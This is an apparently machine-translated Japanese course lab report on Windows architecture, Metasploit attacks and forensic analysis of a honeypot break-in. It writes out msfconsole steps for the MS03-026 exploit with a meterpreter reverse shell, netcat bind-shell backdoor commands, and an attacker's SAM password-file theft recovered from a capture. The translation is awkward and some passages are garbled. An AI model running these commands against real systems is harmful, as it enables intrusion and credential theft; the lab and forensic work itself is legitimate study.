学習の概要と実践的なコンテンツ
Windowsの基本構造
次の表は、Windowsシステムのコアコンポーネントのファイル名です。
ファイル名 | 部品 |
---|---|
Ntoskrnl.exe | エグゼキューターとカーネル |
Ntkrnlpa.exe(32ビットのみ) | PAEをサポート |
Hal.dll | ハードウェアアブストラクションレイヤー |
Win32k.sys | サブシステムのカーネルモード部分 |
Ntdll.dll | 内部機能 |
Kernal32.dll、Advapi32.dll、User32.dll、Gdi32.dll | コアサブシステムのコンポーネント |
Windowsオペレーティングシステムカーネルの基本モジュールには、次のものがあります。
- Windows実行可能ファイル: Windowsカーネルコアファイルntoskrnl.exeの上位インターフェイス。これには、プロセスとスレッドの管理、メモリ管理、I / O管理、ネットワーク接続、プロセス間通信、セキュリティサービスなどの基本的なオペレーティングシステムカーネルサービスが含まれます。
- Windowsカーネルボディ: Windowsカーネルコアファイルmoskrnl.exeの関数実装およびハードウェアアーキテクチャサポートコード。これは、スレッドスケジューリング、割り込みおよび例外分散処理、マルチプロセッサ同期メカニズムなどの、基盤となるオペレーティングシステム機能を実装し、さらに提供します。幹部が高レベルの機能サービスを実装するのに役立つカーネルルーチンと基本オブジェクトのセット。
- デバイスドライバー:ユーザーI / O操作を特定のハードウェアデバイスI / O要求にマップするハードウェアデバイスドライバー、およびファイルシステムとネットワークデバイスドライバーが含まれます。この部分は、デジタル署名認証をカーネルに渡して実行したサードパーティのハードウェアメーカーのハードウェアデバイスドライバーのロードをサポートします。
- ハードウェアアブストラクションレイヤー: hal.dllファイルは、Windowsカーネルとプラットフォームハードウェアの違いをシールドするために使用される基本的なコードです。
- Windowsウィンドウとグラフィカルインターフェイスインターフェイスのカーネル実装コード:win32k.sysファイル。
ユーザーモードのWindowsオペレーティングシステムのコードモジュールには、次のものがあります。
- システムサポートプロセス: Windowsの起動時に自動的に開始されるシステムの組み込みサービスプロセス(ログインプロセスや、ログインしたユーザーのID認証を担当するセッション管理プロセスなど)。
- 環境サブシステムサービスプロセス:オペレーティングシステムのオペレーティング環境をサポートするサービスプロセスを提供します。WindowsXPはWindows環境サブシステムのみをサポートしますが、POSIX規格に準拠する環境サブシステムは、UNIX製品の無料サービスとして提供されます。
- サービスプロセス:タスクスケジューラタスクマネージャーサービス、Microsoft SQL ServerネットワークサービスなどのWindowsサービス管理メカニズムを通じて開始されるシステムサービスとネットワークサービス
- ユーザーアプリケーションソフトウェア:ユーザーモードで実行されるすべての種類のユーザーアプリケーションソフトウェア。
- コアサブシステムDLL:つまり、kernel32.dll / user32.dll / gdi32.dll / advapi32.dllおよびその他のダイナミックリンクライブラリファイル。ユーザーインターフェイスサービスプロセスおよびアプリケーションソフトウェアとオペレーティングシステムのカーネルインタラクティブインターフェイスとして、ユーザーモードプログラムを呼び出すシステムAPI関数は、Windows内の対応する1つ以上のシステムサービスコールにマップされます。
Windowsリモートセキュリティ攻撃および防御テクノロジー
- リモートパスワードの推測とクラッキング攻撃。
- Windowsネットワークサービスを攻撃する。
- Windowsクライアントおよびユーザーを攻撃します。
特定のターゲットに対する侵入テスト攻撃プロセス
- 脆弱性スキャンテスト:侵入テスト担当者は、ターゲットシステムをスキャンして、システムの既知のセキュリティの脆弱性を発見できます。
- 発見された脆弱性の侵入コードを見つける:セキュリティ脆弱性情報データベースのインデックス情報によると、侵入テスターは、セキュリティコミュニティのいくつかの侵入攻撃コードリソース共有サイトで特定のセキュリティ脆弱性の侵入攻撃コードリソースを見つけることができます。
- 侵入テストの実装:特定のターゲットにセキュリティの脆弱性がある侵入コードを選択した後、侵入テスターは実際のエクスプロイト攻撃プロセスを実装できますが、テスターの期待される目標が達成されるかどうかは、ターゲットの侵入コードとソフトウェア環境に依存します一致するかどうか。
ミートスプロイト紹介
Metasploitが2004年に登場したとき、すぐにセキュリティコミュニティ全体から大きな注目を集め、すぐに最も人気のある侵入テストソフトウェアになりました。Metasploitは、侵入テストの初心者に強力で使いやすいソフトウェアを提供するだけでなく、その脆弱性エクスプロイトコードベースは、セキュリティ技術者が脆弱性の分析と調査を行うための重要なリソースでもあります。Metasploitは現在でも、セキュリティコミュニティがソフトウェアセキュリティの脆弱性分析の研究開発を行うための一般的なプラットフォームになっています。Metasploitの人気により、Metasploitモジュールでリリースされたエクスプロイトプログラムが脆弱性リリースの主流になり、関連する書籍や資料も春のように市場に流入しています。言うまでもなく、Meatsploitはセキュリティコミュニティで輝かしい宝物になり、「外出して準備する」セキュリティ技術者のための侵入テストソフトウェアです。
実践的な実践:Metasploit Windows Attack
タスク:Windowsリモート侵入攻撃実験にMetasploitソフトウェアを使用します。
特定のタスク:Windows攻撃者/ BT4攻撃マシンを使用して、Windows MetasploitableターゲットマシンのMS08-067脆弱性に対するリモート侵入攻撃を試み、ターゲットホストへのアクセスを取得します。
練習ステップ:
- metasploitソフトウェアを起動します。個人の好みに応じて、msfconsole、msfgui、msfwebのいずれかを使用できます。
- エクスプロイトを使用する:Windows / smb / ms08_067_netapi侵入攻撃モジュール。
- PAYLOADをリモートシェルとして攻撃することを選択します(順方向接続と逆方向接続の両方を使用できます)。
- 侵入攻撃パラメータ(RHOST、LHOST、TARGETなど)を設定します。
- 侵入攻撃を実行します。
- リモートシェルが正しく取得されているか確認し、取得した権限を確認してください。
実験環境:
名前 | IP |
---|---|
カーリー | 192.168.1.7 |
Win2KServer | 192.168.1.17 |
次のコマンドを使用して、Kali攻撃マシンのターミナルでMetasploitを入力します。
sudo su
sudo apt-get install metasploit-framework
msfconsole
攻撃のターゲットの脆弱性としてMS03-026を使用します。
use exploit/windows/dcerpc/ms03_026_dcom
逆接続を開くように負荷を設定します。
set PAYLOAD windows/meterpreter/reverse_tcp
攻撃者のIPを設定します。
set LHOST 192.168.1.7
ターゲットIPを設定します。
set RHOST 192.168.1.17
攻撃を開始します。
exploit
図は、実行し、成功した攻撃を表しshell
ドローンシェルを開いて、コマンドを:
使用ipconfig
認証:
コマンドが正常に実行され、攻撃が成功しました。
Windowsリモコンとバックドア
コマンドラインリモートコントロールツール
セキュリティ業界では「スイスアーミーナイフ」として知られているNetcatツールは、攻撃者に最もよく使用されるコマンドラインリモートコントロールツールであり、Windowsバージョンも提供されています。netcatをすることができますがnc -L -d -e cmd.exe -p 80
、バックドアサービスコマンドを起動し、TCP 80ポートモニタが設定されています。
MetasploitペネトレーションテストソフトウェアのMeterpreter攻撃ロードモジュールは、非常に豊富で強力なコマンドラインリモートコントロールツールでもあります。ローカル特権の昇格、機密情報の盗難、ログの削除、リモートからターゲットシステムを制御する機能を備えています。
グラフィカルリモートコントロールツール
業界で最も有名な無料のグラフィカルリモートコントロールツールの1つは、英国ケンブリッジのAT&T Research Labによって開発されたVNCソフトウェアです。ターゲットの制御対象ホストにVNCサーバーをインストールして起動すると、制御側でVNCクライアントソフトウェアを使用できますリモコン用。
ハッキング業界では、制御されたホストの制御に特化したバックドアプログラムもいくつかあります。最も古典的なものは、American Dead Cow Worshipハッキングチームによって開発されたBOおよび8O2Kです。国内のハッキングサークルは、いくつかの非常に有名で強力なGlacier、Guangwai Girls、Grey Pigeonなどのリモートコントロールツール
実務
フォレンジック分析の実践:成功したNTシステムクラッキング攻撃のデコード。
分析データソースには、攻撃プロセス全体を含むバイナリログファイルのみが含まれており、このファイルから攻撃プロセス全体を抽出して分析することがタスクです。
- 攻撃者が攻撃に使用したクラックツールは何ですか?
- 攻撃者はこのクラッキングツールをどのように使用してシステムに入り、システムを制御しましたか?
- システムにアクセスした後、攻撃者は何をしましたか?
- このような攻撃を防ぐにはどうすればよいですか?
- 攻撃者は標的がハニーポットのホストであることを警戒していると思いますか?はいの場合、なぜですか?
まず、ログファイル「[email protected]」をダウンロードし、Wiresharkで直接開きます。
攻撃者が攻撃に使用したクラックツールは何ですか?
タイトルでフィルタリング:
ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106
攻撃者は、HTTPアクセスして下さい、あなたは攻撃者のオペレーティングシステムを見ることができます:
117のパケットで、攻撃者はブートファイルBOOT.INIを開け見つける:
149のパケット、TCPストリームの追跡では、あなたが見ることができselect * from
、他の言葉をこれは、SQLインジェクション攻撃であることを知っている可能性があります
検索してADM!ROX!YOUR!WORLD
にここで我々は、脆弱性の説明と手順は、ツールを攻撃しました。
攻撃者はこのクラッキングツールをどのように使用してシステムに入り、システムを制御しましたか?
パケット179のTCPフローを追跡すると、次の命令を確認できます。攻撃者はftpcomスクリプトを作成しました。
cmd /c echo user johna2k > ftpcom
パケット299のTCPフローを追跡して、攻撃者がFTPサーバーに接続しようとし204.42.253.18
たが、失敗しました:
パケット1106まで、FTP接続は成功しました:
攻撃者が実行したことを確認しながら、パケット1224を表示し続けます:
cmd1.exe /c nc -l -p 6969 -e cmd1.exe
攻撃者がポート6969に接続してアクセスしたことを示します。
この時点で、攻撃者はシステムに入り、アクセスを取得するプロセスを完了しています。
システムにアクセスした後、攻撃者は何をしましたか?
tcp.port == 6969
TCPフローのフィルタリングと追跡:
攻撃者は最初にセッションを一覧表示しようとしましたが、権限の問題により拒否されました:
ユーザーのリスト:
CドライブのルートディレクトリにあるREADME.NOW.Hax0rファイルにエコーメッセージが送信されました。
いくつかのファイルが削除されました:
使用してrdisk
パスワードファイルSAM(セキュリティアカウントマネージャ)は、取得しようとrdisk
実行し、ディスク修復プログラムでrdisk /s-
重要なシステム情報のバックアップを、SAMはSAM._ /修復ディレクトリという名前の圧縮コピーを作成し、攻撃者にファイルをコピーしますhar.txtに移動して印刷します。
このような攻撃を防ぐにはどうすればよいですか?
- システムを最新の安定したバージョンにアップグレードします
- マイクロソフトの公式の脆弱性パッチを時間内に更新する
攻撃者は標的がハニーポットのホストであることを警戒していると思いますか?はいの場合、なぜですか?
ええ
パケット4351で、攻撃者は記録を残しました:
チームの対立の実践:Windowsシステムのリモート侵入攻撃と分析。
攻撃と防御の対立実践コンテンツ:攻撃者Metasploit Windows Attack、防御者:Wiresharkは攻撃ストリームをキャプチャし、攻撃されているセキュリティ脆弱性を分析し、公式Webサイトからセキュリティ脆弱性パッチをダウンロードして修復し、攻撃と防御プロセスレポートを提供します。
攻撃者:metasploitを使用して、メタスプロイタブルの脆弱性を選択し、侵入攻撃を実行して制御を獲得します。
Defender:tcpdump / wireshark / snortを使用してネットワーク攻撃のパケットファイルを監視し、wireshark / snortを組み合わせて攻撃プロセスを分析し、攻撃者のIPアドレス、ターゲットIPとポート、攻撃の開始時間、攻撃の悪用の脆弱性、攻撃にシェルコードを使用します。そして、攻撃が成功した後にローカルで実行されるコマンドの入力。
実験環境:
名前 | IP |
---|---|
カーリー | 192.168.1.7 |
Win2KServer | 192.168.1.17 |
次のコマンドを使用して、Kali攻撃マシンのターミナルでMetasploitを入力します。
msfconsole
攻撃のターゲットの脆弱性としてMS03-026を使用します。
use exploit/windows/dcerpc/ms03_026_dcom
逆接続を開くように負荷を設定します。
set PAYLOAD windows/meterpreter/reverse_tcp
攻撃者のIPを設定します。
set LHOST 192.168.1.7
ターゲットIPを設定します。
set RHOST 192.168.1.17
攻撃を開始します。
exploit
Wiresharkを開き、フィルターします。
ip.addr == 192.168.1.7 && ip.addr == 192.168.1.17
攻撃機は最初に入力しshell
、再入力してipconfig
コマンドを、ビューWiresharkのキャプチャに:
その攻撃機に入力するipconfig
と、実行、ドローンは、データパッケージの実行結果を返しました。
学習と解決策で発生した問題
Q:中カーリーmsfconsole
コマンドは無効です。
A:インストールmetasploit-framework
を解決することができます。
Q:カーリー、エクスプロイトを使用した後に勝つ実行しshell
たコマンドが無効です。
A:さらに数回試行した後、それは正常です。
Q:MS08-067の脆弱性がターゲットマシンへの攻撃に使用され、ターゲットマシンがスタックしました。
A:他の脆弱性を利用して攻撃します。
まとめ
ネットワークの攻撃と防御のピットは本当にたくさんあり、他人の攻撃と防御のログを分析するには忍耐が必要です。多くの攻撃の原則はまだあまり明確ではありません。ゆっくりと学習してください。